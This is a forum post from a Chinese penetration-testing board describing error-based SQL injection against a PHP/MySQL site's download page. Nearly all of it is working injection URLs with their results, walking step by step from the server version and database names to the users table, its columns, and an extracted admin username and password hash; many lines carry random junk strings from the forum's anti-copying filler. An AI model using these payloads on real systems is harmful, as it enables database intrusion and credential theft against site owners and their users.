找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php+mysql高级爆错注入经测算有效
返回列表 发新帖
查看: 2559|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666: b4 c; m; @& G; R) C

( }0 T: `* C" S- g( p- C之前想找个测试 没想到这有 可以测试下做个记录而已 2 |" ?& P+ \) J
5 B8 h. i* A  g  q5 l
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003* |$ v# n! _8 v

8 B3 n1 _$ G- u6 {0 I. ?. G. t, O/data0/htdocs/leqi_new/app/myapp.php
  e9 o) r  Z" J4 K" T0 ]/ G8 b9 J) k9 f& A) {- W( o/ I! w3 D9 X' ^
或者
9 I7 r6 S) E8 K! b, o
* h1 u- _3 @$ F$ L- ~( ?/**********version()**********/ 5.1.49-log* ~3 g' S; |7 L; X. }0 [
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
  @/ Q/ m! M1 b, ^' K
0 S% e0 m: g$ \% H/**********user()**********/  
1 W. Z0 _# x7 m/ fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003+ D6 s3 I* A2 y6 ~! \

" m; r5 K. M. V4 w* M" _2 q" M$ s/ u/**********database()**********/  leqi# |5 K; n' E; p+ s$ I% M; u
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
, V( _( V3 \! A% ^2 C# i- u5 l- q( h3 z0 z
/**********limit依次递归爆库**********/
: I; ^; X6 d: @6 A$ P- fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
( C& s, z" D" q/ Minformation_schema& e7 e- Z% H6 a
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
* ?1 o8 B1 {: g! a% O& A9 [leqi/ L1 _5 w* _! ?# b' ~$ z3 P
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003  i. v9 N/ G, @. k9 K" S
test) a5 \! E) m& m
* [* L- X! M4 q: A3 ^! |, _7 W
/**********limit依次递归爆表名**********/5 W& Z2 v5 @; j8 z' b# g% f5 P
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003/ w9 d1 _. q, x" ]' X; ~
users- K) @; A( V$ K2 K% {8 ]* j% u5 F
+ b3 A6 c  W% B8 ?+ o  Y
/**********limit依次递归爆字段名**********/
0 P& l" U- @% H: T, Zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
* p. i) ?3 @2 g) Vuser_id,username,nickname,passwd,group_id; g3 ^8 h5 b( q
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23& O5 V* X5 N9 I2 }
/wapc/5000_0005_003
: c* x& f3 r3 K* i/ B' l11 217 o& R' h0 V% ^3 m
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
5 ~3 _6 |. @2 S( }/wapc/5000_0005_003
: P* J. {) W" O7 A11 341 351 361% ?0 j4 m# O2 S+ k& N1 D8 C5 E
/**********爆数据**********/
" J3 m3 e4 s" jhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
; h8 j- R/ t. Y& V$ ~5 Z6 [admin
2 p6 O% H% X+ Y! u3 t0 n- zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6 w4 J' i# n( }* n" r6a8b4574ca231eb8bd52764d4978ffcd
" l/ M# ]2 Z  t, [" P- b) Y' N
# I( r% f0 z- L$ ^
9 ~1 Z/ X7 v, u8 n# N3 Q
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表